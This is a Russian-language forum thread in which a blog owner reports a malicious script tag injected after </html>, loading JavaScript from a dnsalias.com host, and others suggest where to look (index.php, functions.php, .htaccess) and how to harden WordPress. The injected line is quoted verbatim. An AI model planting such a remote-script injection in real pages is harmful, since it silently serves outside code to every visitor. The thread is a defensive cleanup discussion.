Новая тема   Ответить

 mazzzer2
На блоге появился подключаемый скрипт с вирусней (может не вирусня, конечно, но это не мое ), причем вставлен он после </html>

</html><script src="http://eetitqf.dnsalias.com/js/rsize.js"></script>

Где найти как он вставляется? В футере все чисто.

 Дартаньян
ищи по изменениям, лично я знаю 10 вариантов, из них 6 хитровыебаных.

Ну а так для начала, index.php в корне и functions.php проверь. также глянь htaccess там можно добавлять тоже, мало кто знает но встречал.

 johndoe2
Код:

 mazzzer2
Действительно в index.php в корне было, че-то не посмотрел туда

 gewi
Нужно смотреть что в логах. И разматывать цепочку латать уязвимость и чистится.

 mazzzer2
Уметь бы еще это делать

 Дартаньян
mazzzer2: дай фтп доступ, деловто 10 минут.

 mazzzer2
так нашел уже
остальные файлы без изменений
по фтп нельзя же логи посмотреть

 Дартаньян
mazzzer2: удалить то удалил а как залил то не знаешь ведь.

 andreich
Дартаньян: а можно поинтересоватся, как ты с FTP доступом узнаешь как его залили ?

 Дартаньян
andreich: опять, ты гвардеец, какое тебе дело до этого? Интересно? Так по гугли!

 andreich
да хули мне гуглить, если нормально настроен сервак, ты даже логов по FTP не сможешь посмотреть

я тебе что Грубил ? помойму ты какойто дальний родственик suomi


mazzzer2: если блог на WP обнови до последней версии, тут я бы вообще предложил радикальные меры, убивание всех файлов кроме папки /wp-content/ ну и конечно фала wp-config.php
ну полежит блог 5 минут ничего страшного
проверь права CHMOD на папки
посмотри что в папке /wp-content/uploads/ (в основном овно как раз туда попадает, так как папка в большинстве случаев имеет CHMOD 777

 Дартаньян
andreich: просто ты утомил меня , на хрен мне логи? я файлики посмотрю, уверяю у меня опыт латания и администрирования этого больше чем у тебя опыта в АВМ, особенно помню про require для удаленных файлов. кстати ты когда включил allow_url_include, сапка то наверное и заработала, только для WP твой гениальный подход это смерть.

mazzzer2: также смени пасс к ftp и админки, проверь если еще один админ или редактор какой левый, есть также плагин и плагин.

 andreich
Дартаньян писал:
ну может быть, но как мне кажется, это ты уже утомил всех на форуме
своми мега весерами мозга

P.S. allow_url_include было там не причем

 Дартаньян
andreich писал: покинь топик ты все равно в этом не шаришь.

 awm5433224455
А как вы поняли что у тс вордпрес то

 Дартаньян
awm5433224455: 95% что вордпресс, ну да еще бывают адалтеры с DLE, но с них как с инвалидов смеяться нельзя.

 awm5433224455
Дартаньян писал:
да и вордпресс я из за этого не долюбливаю потому что в нем постоянно косяки и над ним нужно корпеть постоянно. А когда разрастается это все до нескольких сайтов тут совсем веселье начинается.
Даже гонки успел обновиться или червь пробежался по всем и проставил фрейма

 Дартаньян
awm5433224455: накатаю мануал, по безопасности для WP.

 st01en
Ты сначала накатай то, что обещал

 Дартаньян
st01en: пишу, учел пожелания доброжелателей к краткому мануалу.

 awm5433224455
Дартаньян писал:
Тут нужно осторожно писать, по безопастности лучше не писать. Научишь переломают пол интернета за ночь

 andreich
awm5433224455: че он там может написать ? там все сводится к двум вещям - CHMOD правильные и правильно настроенный сервак, вот и все

 awm5433224455
скрипт кидисы всеравно сумеют нагадить своими дефейсами вида луиз сек

 Дартаньян
andreich писал: вот ты и ответил о чем я напишу.